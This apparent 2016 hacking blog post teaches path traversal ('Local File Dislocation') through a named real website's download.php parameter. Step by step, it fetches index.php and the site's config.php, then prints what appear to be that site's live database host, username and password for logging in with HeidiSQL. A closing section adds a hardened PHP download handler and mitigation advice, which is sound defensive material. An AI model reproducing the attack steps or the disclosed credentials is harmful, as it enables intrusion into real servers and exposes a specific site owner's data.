Thursday, 17 March 2016

How to Hack Sites With Local File Dislocation

What Is LFD:-

In Local File Dislocation, an attacker is able to download the config.php (database) file and steal the DB password, user name, database name and host name, connect to the database using some software (HeidiSQL), and then log in to phpMyAdmin. In Local File Dislocation, the URL shows the web server directory (that is the vulnerable section).

Ex:-

www.site.com/download.php?arquivo=/home/mturbina2/public_html/sistema/apresentacao.pdf
OK, let's start. I have a website; let's try to download its config file:

Target:- www.mturbina.com.br/site/download.php?arquivo=/home/mturbina2/public_html/sistema/produtos/kaindl/000000011/pdf/apresentacao.pdf

Step:-1 

Copy and paste the target URL into the web browser's URL bar and hit Enter.

Step:-2 

When we hit Enter, a file is downloaded. This file is useless; we only need to download index.php and config.php.

Step:-3 

Remove everything in the URL after ( download.php?arquivo= ), or remove the part of the URL after ( =/home/mturbina2/public_html/ ). Follow either condition; I follow the first condition.

Ex:- (the URL now looks like this)
www.mturbina.com.br/site/download.php?arquivo=

Step:-4 

Put ( ../index.php ) after ?arquivo=. It is used for directory jumping, that is, going back one directory on the server. Sometimes we use ( ../../../../../../../index.php ), with ../ repeated more than once, to reach the correct location. (But on this site we do not need to jump to another location, so we do not need to put ( ../ ).)

Ex:- The URL now looks like this: http://www.mturbina.com.br/site/download.php?arquivo=index.php
You can see the index.php file start downloading (download it).

Step:-5 

Open the downloaded file (index.php) in Notepad. Using index.php, we find the location of the config.php (database connection) file. We successfully find the location of the config file ( "../sistema/config.php" ).

Step:-6 

Now download the ( ../sistema/config.php ) file and connect to the database.

Ex:- http://www.mturbina.com.br/site/download.php?arquivo=../sistema/config.php

Step:-7 

Open HeidiSQL (download it here: http://www.heidisql.com/download.php ) and put the database entries in it.

Config entries for HeidiSQL (located in the config file):
Db_Hostname=179.188.16.14
DbUser=mturbina2
DbPass=turbina72
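
Seen from the defender's side, every step above depends on a download script that hands the `arquivo` parameter to the filesystem unchecked. The handler below is an added example, not code from this post or from the site: it confines downloads to one directory and to an allowlist of file types, and `DOWNLOAD_ROOT`, `ALLOWED_EXT` and `resolve_download()` are hypothetical names chosen for illustration.

```php
<?php
declare(strict_types=1);

// Hardened download handler (added example; not the site's code).
// Assumptions: downloadable files live under DOWNLOAD_ROOT, outside the
// directories that hold PHP source, and only the listed types are offered.
const DOWNLOAD_ROOT = '/var/www/downloads';          // hypothetical path
const ALLOWED_EXT   = ['pdf' => 'application/pdf'];  // hypothetical allowlist

/** Map a user-supplied name to a file inside $root, or return null. */
function resolve_download(string $requested, string $root = DOWNLOAD_ROOT): ?string
{
    // Reject empty names, NUL bytes and absolute paths (/home/user/public_html/...).
    if ($requested === '' || strpos($requested, "\0") !== false || $requested[0] === '/') {
        return null;
    }
    $base = realpath($root);
    // realpath() collapses ../ and follows symlinks; it returns false if the file is missing.
    $path = realpath($root . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    // The canonical path must still sit under the canonical root.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    // Serve only allowlisted types, so index.php and config.php are never sent.
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    return array_key_exists($ext, ALLOWED_EXT) ? $path : null;
}

if (PHP_SAPI !== 'cli') {
    $raw  = $_GET['arquivo'] ?? '';
    $path = is_string($raw) ? resolve_download($raw) : null;
    if ($path === null) {
        http_response_code(404);   // same answer for "missing" and "not allowed"
        exit;
    }
    $ext  = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    $name = str_replace('"', '', basename($path));
    header('Content-Type: ' . ALLOWED_EXT[$ext]);
    header('Content-Disposition: attachment; filename="' . $name . '"');
    header('X-Content-Type-Options: nosniff');
    header('Content-Length: ' . (string)filesize($path));
    readfile($path);
}
```

With this check in place, requests for `index.php`, `../sistema/config.php` or an absolute `/home/...` path all return 404. Keeping database credentials out of the web root and restricting the database host to local connections limits the damage if a file is disclosed anyway.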